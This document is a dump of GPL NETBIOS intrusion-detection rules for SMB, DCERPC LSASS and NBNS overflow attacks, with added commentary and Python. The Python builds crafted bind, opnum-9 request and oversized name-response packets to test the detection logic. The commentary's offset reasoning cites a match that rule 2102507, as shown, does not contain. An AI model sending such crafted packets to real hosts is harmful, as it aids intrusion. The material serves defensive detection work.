#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB SMB_COM_TRANSACTION Max Parameter and Max Count of 0 DOS Attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; content:"|00 00 00 00|"; depth:4; offset:43; reference:bugtraq,5556; reference:cve,2002-0724; reference:nessus,11110; reference:url,www.corest.com/common/showdoc.php?idx=262; reference:url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx; classtype:denial-of-service; sid:2102101; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB SMB_COM_TRANSACTION Max Parameter and Max Count of 0 DOS Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : denial-of-service

URL reference : bugtraq,5556|cve,2002-0724|nessus,11110|url,www.corest.com/common/showdoc.php?idx=262|url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102507

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS bind attempt"; flow:to_server,established; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102507; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC LSASS bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102508

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS DsRolerUpgradeDownlevelServer Exploit attempt"; flow:to_server,established; content:"|05|"; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; flowbits:isset,netbios.lsass.bind.attempt; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102508; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC LSASS DsRolerUpgradeDownlevelServer Exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined
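
The two rules above (2102507 and 2102508) are a classic flowbits pair: the bind rule recognises a DCERPC bind to the DSROLE interface (the UUID bytes "j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|") and only sets netbios.lsass.bind.attempt with flowbits:noalert, while the exploit rule fires solely on a later request whose opnum at offset 22 is 9 (DsRolerUpgradeDownlevelServer) and only if that bit is set on the flow. The offsets come from the rule arithmetic: content:"|0B|" leaves the cursor at byte 3, distance:29 moves it to byte 32, which is the abstract-syntax UUID of the first presentation context in a bind PDU. The following Python is an added example, not code from the ruleset or from Emerging Threats: it parses the connection-oriented DCERPC header, mirrors the per-flow flowbits state for the LSASS and ISystemActivator bind rules on the page, and evaluates the exploit rule. The PDU builders, flow keys and addresses are constructed test data; the field layout is the standard DCERPC CO header (version, minor, ptype, pfc_flags, drep, frag_length, auth_length, call_id).

```python
import struct
from typing import Dict, Optional, Set, Tuple

# Raw 16-byte wire encodings of the interface UUIDs exactly as the rule content
# strings spell them (the first three UUID fields are little-endian on the wire).
LSASS_DSROLE_UUID = bytes.fromhex("6a2819390cb1d0119ba800c04fd92ef5")      # 3919286a-b10c-11d0-9ba8-00c04fd92ef5
ISYSTEMACTIVATOR_UUID = bytes.fromhex("a001000000000000c000000000000046")  # 000001a0-0000-0000-c000-000000000046
NDR_TRANSFER_SYNTAX = bytes.fromhex("045d888aeb1cc9119fe808002b104860")    # 8a885d04-1ceb-11c9-9fe8-08002b104860, v2

PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B
PFC_FIRST_FRAG = 0x01

# Bind rules on this page: UUID found at offset 32 -> flowbit they set (both noalert).
BIND_RULES: Dict[bytes, str] = {
    LSASS_DSROLE_UUID: "netbios.lsass.bind.attempt",             # sid 2102507
    ISYSTEMACTIVATOR_UUID: "dce.isystemactivator.bind.attempt",  # sid 2102192
}
# Exploit rules: (flowbit that must already be set, opnum at offset 22) -> msg.
EXPLOIT_RULES: Dict[Tuple[str, int], str] = {
    ("netbios.lsass.bind.attempt", 9):
        "GPL NETBIOS DCERPC LSASS DsRolerUpgradeDownlevelServer Exploit attempt",  # sid 2102508
}


def dcerpc_fields(pdu: bytes) -> Optional[Tuple[int, int, int]]:
    """Return (ptype, pfc_flags, frag_length) for a CO DCERPC PDU, or None when the
    first byte is not rpc_vers 5 (the content:"|05|"; depth:1 check in the rule).
    Integer byte order follows bit 0x10 of the first drep byte."""
    if len(pdu) < 16 or pdu[0] != 0x05:
        return None
    order = "<" if pdu[4] & 0x10 else ">"
    frag_len = struct.unpack_from(order + "H", pdu, 8)[0]
    return pdu[2], pdu[3], frag_len


class FlowbitDetector:
    """Per-flow state mirroring flowbits:set on the bind rules and flowbits:isset
    on the exploit rule.  The flow key is whatever the caller uses (5-tuple here)."""

    def __init__(self) -> None:
        self.flowbits: Dict[Tuple, Set[str]] = {}

    def inspect(self, flow: Tuple, pdu: bytes) -> Optional[str]:
        parsed = dcerpc_fields(pdu)
        if parsed is None:
            return None
        ptype, flags, _ = parsed
        bits = self.flowbits.setdefault(flow, set())
        if ptype == PTYPE_BIND and flags & PFC_FIRST_FRAG and len(pdu) >= 48:
            # byte_test:1,&,1,0,relative checks PFC_FIRST_FRAG at byte 3; the UUID
            # content is then matched at byte 3 + distance 29 = offset 32.
            bit = BIND_RULES.get(pdu[32:48])
            if bit:
                bits.add(bit)  # flowbits:set ... flowbits:noalert -> nothing returned
            return None
        if ptype == PTYPE_REQUEST and len(pdu) >= 24:
            # request header after the 16 common bytes: alloc_hint(4), context_id(2), opnum(2)
            order = "<" if pdu[4] & 0x10 else ">"
            opnum = struct.unpack_from(order + "H", pdu, 22)[0]
            for (needed_bit, needed_opnum), msg in EXPLOIT_RULES.items():
                if needed_bit in bits and opnum == needed_opnum:
                    return msg
        return None


def build_bind(abstract_uuid: bytes, call_id: int = 1) -> bytes:
    """Constructed 72-byte DCERPC bind carrying one presentation context."""
    body = struct.pack("<HHI", 5840, 5840, 0)           # max_xmit_frag, max_recv_frag, assoc_group
    body += struct.pack("<BxxxHBx", 1, 0, 1)            # n_context_elem + pad; context_id, n_transfer_syn + pad
    body += abstract_uuid + struct.pack("<HH", 0, 0)    # abstract syntax UUID + interface version
    body += NDR_TRANSFER_SYNTAX + struct.pack("<I", 2)  # transfer syntax UUID + version
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, PFC_FIRST_FRAG | 0x02,
                      b"\x10\x00\x00\x00", 16 + len(body), 0, call_id)
    return hdr + body


def build_request(opnum: int, stub: bytes = b"", call_id: int = 2) -> bytes:
    """Constructed DCERPC request; the stub content is irrelevant to the rule."""
    body = struct.pack("<IHH", len(stub), 0, opnum) + stub  # alloc_hint, context_id, opnum
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_REQUEST, PFC_FIRST_FRAG | 0x02,
                      b"\x10\x00\x00\x00", 16 + len(body), 0, call_id)
    return hdr + body


def run_demo() -> Dict[str, Optional[str]]:
    """Replay constructed flows against the detector and collect the outcomes."""
    det = FlowbitDetector()
    attacker = ("10.0.0.9", 49152, "10.0.0.5", 135)  # constructed flow keys
    other = ("10.0.0.7", 49153, "10.0.0.5", 135)
    results: Dict[str, Optional[str]] = {}
    results["bind_lsass"] = det.inspect(attacker, build_bind(LSASS_DSROLE_UUID))          # None: noalert
    results["request_opnum9"] = det.inspect(attacker, build_request(9, b"A" * 64))        # exploit rule fires
    results["request_without_bind"] = det.inspect(other, build_request(9))                # None: bit never set
    det.inspect(other, build_bind(ISYSTEMACTIVATOR_UUID))                                 # sets a different bit
    results["wrong_interface"] = det.inspect(other, build_request(9))                     # None: wrong bit
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:22s} -> {outcome}")
```

Two points worth noting against the page. First, the detector only models the raw TCP/135 framing; on 139 and 445 the same PDU rides inside an SMB Trans request to \PIPE\..., which is why the SMB-DS variants (2102512, 2102513) count their offsets from the |FF|SMB header instead. Second, in this dump the exploit rule 2102508 is commented out while the bind rule 2102507 is enabled, so enabling only the bind rule produces no alert at all: the bit is set and nothing ever tests it.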

2102509

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102509; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102510

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102510; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102511

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt"; flow:to_server,established; flowbits:isset,netbios.lsass.bind.attempt; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; distance:59; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102511; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102512

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102512; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102513

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102513; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102514

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt"; flow:to_server,established; flowbits:isset,netbios.lsass.bind.attempt; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; distance:59; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102514; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102524

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS direct bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102524; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC LSASS direct bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102525

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS direct bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102525; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC LSASS direct bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102526

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102526; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC LSASS direct bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,10108|cve,2003-0533|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102563

#alert udp $EXTERNAL_NET 137 -> $HOME_NET any (msg:"GPL NETBIOS NS lookup response name overflow attempt"; byte_test:1,>,127,2; content:"|00 01|"; depth:2; offset:6; byte_test:1,>,32,12; metadata: former_category NETBIOS; reference:bugtraq,10333; reference:bugtraq,10334; reference:cve,2004-0444; reference:cve,2004-0445; reference:url,www.eeye.com/html/Research/Advisories/AD20040512A.html; classtype:attempted-admin; sid:2102563; rev:6; metadata:created_at 2010_09_23, updated_at 2017_08_24;)

Name : NS lookup response name overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,10333|bugtraq,10334|cve,2004-0444|cve,2004-0445|url,www.eeye.com/html/Research/Advisories/AD20040512A.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2017-08-24

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined
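
Rule 2102563 is three positional checks on a UDP/137 payload: byte_test:1,>,127,2 requires the QR bit in the flags word (a response), content:"|00 01|" at offset 6 requires ANCOUNT of 1, and byte_test:1,>,32,12 flags a first label longer than 32 bytes. The 32 matters because a NetBIOS name is first-level encoded per RFC 1001/1002: each of the 16 name bytes (15 characters plus a suffix) becomes two ASCII letters, so a well-formed label is always exactly 32 bytes, and anything longer is what the rule treats as an overflow attempt. The Python below is an added example, not part of the ruleset: it encodes and decodes names, builds constructed NBNS responses (addresses and names are made up), and evaluates the rule's three checks as a function.

```python
import struct
from typing import Dict, Optional

ENCODED_NAME_LEN = 32  # 16 name bytes -> 32 ASCII letters after first-level encoding


def first_level_encode(name: str, suffix: int = 0x20) -> bytes:
    """RFC 1001 first-level encoding: pad the name to 15 bytes, append the suffix,
    then split every byte into two nibbles and add them to 'A'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def first_level_decode(enc: bytes) -> bytes:
    """Inverse of first_level_encode; rejects odd lengths and non-letter bytes."""
    if len(enc) % 2 or any(not 0x41 <= c <= 0x50 for c in enc):
        raise ValueError("not a first-level encoded name")
    return bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, len(enc), 2))


def build_nbns_response(label: bytes, txid: int = 0x1234) -> bytes:
    """Constructed positive NBNS name query response with one answer RR.
    Header: ID, flags 0x8500 (QR + AA), QDCOUNT 0, ANCOUNT 1, NSCOUNT 0, ARCOUNT 0."""
    hdr = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)
    rr_name = bytes([len(label)]) + label + b"\x00"
    rr_fixed = struct.pack(">HHIH", 0x0020, 0x0001, 300000, 6)  # NB type, IN class, TTL, RDLENGTH
    rdata = struct.pack(">H", 0x6000) + bytes([10, 0, 0, 5])   # NB_FLAGS (group/H-node bits), constructed address
    return hdr + rr_name + rr_fixed + rdata


def nbns_name_overflow(payload: bytes) -> bool:
    """Rule 2102563 expressed as a predicate over the UDP payload:
       byte_test:1,>,127,2   -> flags high byte has QR set (it is a response)
       content:"|00 01|"; depth:2; offset:6 -> ANCOUNT == 1
       byte_test:1,>,32,12   -> first label length exceeds the 32-byte encoded name."""
    return (len(payload) > 12
            and payload[2] > 127
            and payload[6:8] == b"\x00\x01"
            and payload[12] > ENCODED_NAME_LEN)


def answer_name(payload: bytes) -> Optional[str]:
    """Decode the first answer's NetBIOS name, or None when the label is malformed."""
    if len(payload) < 13:
        return None
    n = payload[12]
    label = payload[13:13 + n]
    if n != ENCODED_NAME_LEN or len(label) != n:
        return None
    decoded = first_level_decode(label)
    return decoded[:15].decode("ascii").rstrip()


def run_demo() -> Dict[str, object]:
    legit = build_nbns_response(first_level_encode("FILESRV01"))
    oversized = build_nbns_response(b"A" * 63)          # 63-byte label: longer than any valid encoded name
    query = bytearray(legit)
    query[2:4] = b"\x01\x10"                            # clear QR: same bytes, but it is a query, not a response
    return {
        "legit_alert": nbns_name_overflow(legit),       # False
        "legit_name": answer_name(legit),               # "FILESRV01"
        "oversized_alert": nbns_name_overflow(oversized),  # True
        "oversized_name": answer_name(oversized),       # None
        "query_alert": nbns_name_overflow(bytes(query)),   # False: QR check fails
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k:16s} -> {v!r}")
```

The checks are purely positional, so the rule sees only the first label of the first RR after the header; a response with QDCOUNT other than 0 shifts the answer section and is not covered, and in this dump the rule is commented out, so it would need enabling before any of this applies to live traffic.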

2103143

#alert tcp $HOME_NET 139 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 response overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; flowbits:unset,smb.trans2; byte_test:2,>,15,34,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103143; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 response overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103144

#alert tcp $HOME_NET 139 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 response andx overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; flowbits:unset,smb.trans2; byte_test:2,>,15,7,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103144; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 response andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103145

#alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 response overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; flowbits:unset,smb.trans2; byte_test:2,>,15,34,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103145; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 response overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103146

#alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 response andx overflow attempt"; flow:established,to_client; flowbits:isset,smb.trans2; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; flowbits:unset,smb.trans2; byte_test:2,>,15,7,relative,little; reference:cve,2005-0045; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx; classtype:protocol-command-decode; sid:2103146; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 response andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2005-0045|url,www.microsoft.com/technet/security/Bulletin/MS05-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103135

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 QUERY_FILE_INFO attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|07 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103135; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 QUERY_FILE_INFO attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

